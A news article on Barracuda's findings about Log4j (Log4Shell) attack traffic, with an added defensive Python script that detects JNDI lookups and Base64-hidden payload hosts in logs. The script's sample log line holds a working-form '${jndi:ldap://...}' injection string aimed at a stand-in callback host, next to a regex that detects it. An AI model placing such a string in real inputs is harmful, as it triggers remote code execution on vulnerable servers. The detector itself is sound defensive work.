Given the popularity of Log4j, a Java-based logging audit framework within Apache, researchers at Barracuda, a trusted partner and leading provider of cloud-first security solutions, have identified attacks targeting its vulnerabilities; these attacks have remained steady since December 10, 2021. The researchers found that 83% of the attacks were conducted from IP addresses in the US, with half of those IP addresses associated with AWS, Azure and other data centres. Meanwhile, 10% of the attacks were conducted from IP addresses in Japan, 3% from Germany, 3% from the Netherlands and 1% from Russia.
These IP addresses only performed the scans and attempted intrusions; once an attack got through, the actual payloads were delivered from other compromised websites or VPS hosts. The IPs hosting the payloads are typically obscured using Base64 encoding.
Log4j is a Java-based logging audit framework, an Apache project used in almost all internet and intranet services. Its newly found vulnerability allows hackers to conduct remote code execution (RCE) attacks on a target system. These attacks are very easy to carry out for anyone who understands how they work.
Attackers controlling log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. The vulnerability impacts default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, which are utilised by numerous organisations like Apple, Amazon, Cloudflare, Twitter, Steam, and others. It is triggered by sending a specific string to the Log4j software, which makes it easy to exploit, and the broad utilisation of this software means there are multiple attack vectors.
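For defenders triaging logs, the two points above (a lookup string that makes Log4j contact an LDAP server, and payload hosts hidden with Base64) can be checked together. The following is an added example, not code from Barracuda or the Log4j project; the log lines, addresses, the `/a/` path and the function names are constructed for illustration.

```python
import base64
import re

# Literal Log4j JNDI lookup, e.g. an LDAP reference placed in a logged field.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^}\s]+)\}", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_hidden_hosts(target):
    """Return IPv4 addresses hidden in Base64 path segments of a lookup target."""
    hosts = []
    for segment in target.split("/")[1:]:      # skip the callback host itself
        if len(segment) < 10:                  # too short to hold an encoded IPv4
            continue
        try:
            padded = segment + "=" * (-len(segment) % 4)
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue                           # not Base64, or not text
        hosts.extend(IPV4_RE.findall(text))
    return hosts


def scan(lines):
    """Flag log lines carrying a JNDI lookup; list callback and decoded hosts."""
    findings = []
    for number, line in enumerate(lines, 1):
        for match in JNDI_RE.finditer(line):
            target = match.group("target")
            findings.append({
                "line": number,
                "scheme": match.group("scheme").lower(),
                "callback": target.split("/", 1)[0],
                "decoded_hosts": decode_hidden_hosts(target),
            })
    return findings


# Constructed sample data: documentation-range addresses, harmless encoded text.
_ENCODED = base64.b64encode(b"198.51.100.7:8080").decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://203.0.113.9:1389/a/' + _ENCODED + '}"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The pattern matches only the literal lookup form, so an empty result is not evidence that a host was never probed. Both the callback host and any decoded host are worth adding to egress blocklists and hunting queries.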
Sharing his insights on such attacks, Tushar Richabadas, Senior Product Marketing Manager, Applications and Cloud Security, Barracuda, said, “Log4j vulnerability has stormed the cyber world. The best way to protect against log4shell specifically is to upgrade to the latest version of log4j software so that vulnerabilities are patched in a timely manner. Due to the growing number of vulnerabilities found in web applications, it is getting progressively more complex to protect against attacks. However, all-in-one solutions are now available to protect web applications from being exploited due to these vulnerabilities. WAF/WAF-as-a-Service solutions, also known as Web Application and API Protection (WAAP) services, can help protect web applications by providing all the latest security solutions in one easy-to-use product.”